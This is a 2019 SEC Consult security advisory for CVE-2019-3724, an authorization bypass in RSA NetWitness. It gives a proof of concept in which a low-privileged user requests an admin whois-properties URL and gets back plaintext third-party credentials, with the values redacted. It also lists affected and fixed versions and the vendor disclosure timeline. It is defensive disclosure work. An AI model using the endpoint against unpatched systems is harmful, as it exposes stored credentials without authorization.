SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >

=======================================================================

　　title: Authorization Bypass

　　product: RSA NetWitness

　　vulnerable version: <10.6.6.1, <11.2.1.1

　　fixed version: 10.6.6.1, 11.2.1.1

　　CVE number: CVE-2019-3724

　　impact: Medium

　　homepage:

　　found: 2018-09-18

　　by: Mantas Juskauskas (Office Vilnius)

　　SEC Consult Vulnerability Lab

　　An integrated part of SEC Consult

　　Europe | Asia | North America

=======================================================================

Vendor description:

-------------------

"RSA provides more than 30,000 customers around the world with the essential

security capabilities to protect their most valuable assets from cyber

threats. With RSA's award-winning products, organizations effectively detect,

investigate, and respond to advanced attacks; confirm and manage identities;

and ultimately, reduce IP theft, fraud, and cybercrime."

Source:

Business recommendation:

------------------------

By exploiting the vulnerability documented in this advisory an unauthorized

attacker can access an administrative resource that may contain plain text

credentials to a 3rd party system.

The vendor provides a patch which should be installed on affected systems.

Vulnerability overview/description:

-----------------------------------

The authorization mechanism provided by the platform is prone to an authorization

bypass vulnerability, which can be easily exploited by authenticated (but low

privileged) remote attackers for gaining access to administrative information

including plaintext passwords.

Proof of concept:

-----------------

A logged-in low privileged user (e.g. with role Analyst) is able to access

an administrative resource by calling the following URL:

https://[host]/admin/system/whois/properties

After the above URL is accessed, the server returns the following HTTP response

that contains sensitive information to a 3rd party whois service including

plaintext passwords:

HTTP/1.1 200 OK

Server: nginx

Date: [snip]

Content-Type: application/json;charset=UTF-8

Connection: close

X-Frame-Options: SAMEORIGIN

Cache-Control: no-cache, no-store, max-age=0, must-revalidate

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

X-Content-Type-Options: nosniff

Strict-Transport-Security: max-age=31536000 ; includeSubDomains

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Set-Cookie: [snip]

Content-Length: 795

{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}}

Vulnerable / tested versions:

-----------------------------

The identified vulnerability has been verified to exist in the

RSA NetWitness platform, version 11.1.0.1.

According to the vendor, platform version 10 is also affected.

The following versions are vulnerable:

* <10.6.6.1

* <11.2.1.1

Vendor contact timeline:

------------------------

2018-10-01: Contacting vendor through PGP via

2018-10-02: Vendor acknowledges the information was received, forwards

            the info to the relevant department

2018-10-11: Vendor confirms the impact of the authorization issue,

            starts to work on the remediation timeline

2018-10-15: Vendor provides additional information

2018-10-22: Contacting vendor to provide the remediation timeline

2018-10-23: Further email exchange related to the remediation timeline

2019-01-18: Vendor provides an update on the fix timeline

2019-03-05: Asking for a status update

2019-03-06: Vendor provides a status update on the release, patch for

            platform version 11 will be released in March, version 10

            Mid-April

2019-04-01: Asking for a specific release date & further status update

2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,

            they will inform us

2019-05-06: Asking for a status update; no answer

2019-05-09: Noticed that the new release is online fow a while now, asking

            the vendor for a status update again

2019-05-09: Vendor: published security advisory URL and CVE

2019-05-15: SEC Consult advisory release

Solution:

---------

The following patched versions address the identified issue:

* 11.2.1.1

* 10.6.6.1

Security advisory of the vendor:

The vendor specifically told us that version 11.3 is not affected by this

vulnerability.

Workaround:

-----------

None

Advisory URL:

-------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Europe | Asia | North America

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com

Web:

Blog:

Twitter:

EOF M. Juskauskas / @2019